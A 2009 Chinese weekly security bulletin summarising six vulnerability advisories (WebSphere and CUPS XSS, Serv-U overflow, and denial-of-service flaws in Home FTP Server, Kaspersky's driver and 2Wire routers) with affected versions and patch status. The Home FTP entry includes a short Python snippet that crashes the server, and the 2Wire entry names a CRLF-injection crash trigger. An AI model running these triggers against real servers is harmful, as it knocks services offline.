当前位置: 安全纵横 > 安全公告

一周业界安全动态(11月16日-11月22日)

来源:安恒信息 日期:2009-11

IBM WebSphere应用服务器管理控制台跨站脚本漏洞
受影响系统:
IBM Websphere Application Server 7.0
IBM Websphere Application Server 6.1
描述:
IBM Websphere应用服务器以Java和Servlet引擎为基础,支持多种HTTP服务,可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。
WebSphere应用服务器的管理控制台存在跨站脚本漏洞,远程攻击者可以通过提交恶意请求向动态生成的网页中注入恶意脚本,当查看该网页时就会执行注入的脚本。成功利用这个漏洞攻击者可以窃取基于Cookie的认证凭据。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www-01.ibm.com/support/docview.wss?uid=swg1PK99481

Home FTP Server SITE INDEX命令拒绝服务漏洞
受影响系统:
Ari Pikivirta Home FTP Server 1.10.1.139
描述:
Home Ftp Server是一款简单易用的FTP服务器。
当用户登录到Home FTP Server后,执行以下步骤就会导致服务器停止响应:

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://downstairs.dnsalias.net/homeftpserver.html

 

Serv-U FTP服务器TEA解码栈溢出漏洞
受影响系统:
RhinoSoft Serv-U 9.0.0.5
描述:
Serv-U FTP是一款FTP服务程序。
Serv-U FTP服务器中使用TEA解码算法处理字符串的16进制表示的函数中存在栈溢出漏洞,远程攻击者可以通过提交超长字符串来触发这个溢出,导致执行任意代码。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.serv-u.com/

 

Kaspersky Anti-Virus kl1.sys驱动本地拒绝服务漏洞
受影响系统:
Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463
描述:
Kaspersky Antivirus是非常流行的杀毒软件。
Kaspersky杀毒软件所使用的kl1.sys驱动没有检查IOCTL的输入地址,如果用户修改了一个或两个DWORD就可以触发异常,导致系统蓝屏死机。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kaspersky.com/

 

2Wire路由器设备管理界面远程拒绝服务漏洞
受影响系统:
2wire Gateway <= 5.29.52
描述:
2Wire HomePortal是2Wire推出的小型路由器设备。
2Wire路由器没有正确地触发发送给管理界面上默认运行于TCP 50001端口上xslt脚本的page参数,远程攻击者可以在该参数中包含有%0d%0a序列导致设备崩溃或重启。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.2wire.com/

 

CUPS kerberos参数跨站脚本漏洞
受影响系统:
Easy Software Products CUPS 1.4.x
Easy Software Products CUPS 1.3.x
描述:
Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。
CUPS没有正确地处理HTTP头和HTML模板,远程攻击者可以通过产品的web界面、打印系统的配置和打印任务的标题提交恶意kerberos参数,执行跨站脚本或HTTP响应拆分攻击。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cups.org/strfiles/3367/security-1.4v2.patch